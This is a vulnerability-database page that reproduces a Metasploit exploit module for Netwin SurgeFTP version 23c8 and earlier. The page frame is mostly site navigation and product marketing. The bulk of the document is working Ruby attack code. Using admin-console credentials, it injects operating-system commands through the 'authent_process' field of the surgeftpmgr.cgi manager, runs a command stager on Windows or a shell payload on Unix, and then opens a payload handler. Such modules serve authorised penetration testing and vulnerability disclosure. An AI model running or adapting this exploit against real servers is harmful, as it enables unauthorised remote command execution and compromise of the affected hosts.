Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netwin SurgeFTP Remote Command Execution

🗓️ 21 Dec 2012 22:10:27Reported by Spencer McIntyre, sinn3r <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 17 Views

Netwin SurgeFTP Remote Command Execution. Exploits vulnerability in Netwin SurgeFTP version 23c8 or prior. Requires valid credentials for web-based administrative console

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netwin SurgeFTP Remote Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8
        or prior.  In order to execute commands via the FTP service, please note that
        you must have a valid credential to the web-based administrative console.
      },
      'Author'         =>
        [
          'Spencer McIntyre',  #Who found this vuln?
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '89105' ],
          [ 'EDB', '23522' ]
        ],
      'Platform'       => %w{ win unix },
      'Targets'        =>
        [
          [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'}  ],
          [ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
        ],
      'DisclosureDate' => '2012-12-06',
      'Notes'          =>
        {
          'Stability'   => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    ))

    register_options(
      [
        Opt::RPORT(7021),
        OptString.new('HttpUsername', [ true, 'The username with admin role to authenticate as', 'admin' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ])
      ])
  end

  def check
    res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})
    if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def execute_command(cmd, opts)
    http_send_command("cmd.exe /q /c #{cmd}")
  end

  def http_send_command(command)
    res = send_request_cgi(
    {
      'uri'     => '/cgi/surgeftpmgr.cgi',
      'method'  => 'POST',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'vars_post' =>
        {
          'global_smtp' => "",
          'global_restart' => "",
          'global_style' => "",
          'global_bind' => "",
          'global_passive_ip' => "",
          'global_passive_match' => "",
          'global_logon_mode' => "",
          'global_log_host' => "",
          'global_login_error' => "",
          'global_adminip' => "",
          'global_total_users' => "",
          'global_con_perip' => "",
          'global_ssl' => "",
          'global_ssl_cipher_list' => "",
          'global_implicit_port' => "",
          'log_level' => "",
          'log_home' => "",
          'global_watcher_program_ul' => "",
          'global_watcher_program_dl' => "",
          'authent_process' => command,
          'authent_cmdopts' => "",
          'authent_number' => "",
          'authent_domain' => "",
          'global_strip_user_domain' => "",
          'global_noclass' => "",
          'global_anon_hammer_over_time' => "",
          'global_anon_hammer_max' => "",
          'global_anon_hammer_block_time' => "",
          'global_port' => "",
          'global_mgr_port' => "",
          'global_mgr_ssl_port' => "",
          'cmd_global_save.x' => "36",
          'cmd_global_save.y' => "8",
        }
    })

    if res and res.body =~ /401 Authorization failed/
      fail_with(Failure::NoAccess, "Unable to log in!")
    elsif not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute command.')
    end
  end

  def exploit
    case target['Platform']
    when 'win'
      print_status("#{rhost}:#{rport} - Sending command stager...")
      execute_cmdstager({:linemax=>500})

    when 'unix'
      print_status("#{rhost}:#{rport} - Sending payload...")
      http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
0.6Low risk
Vulners AI Score0.6
netwin surgeftpremote command executionvulnerabilityauthentication bypassmetasploitwindowsunixcsrfauthorization failed.
17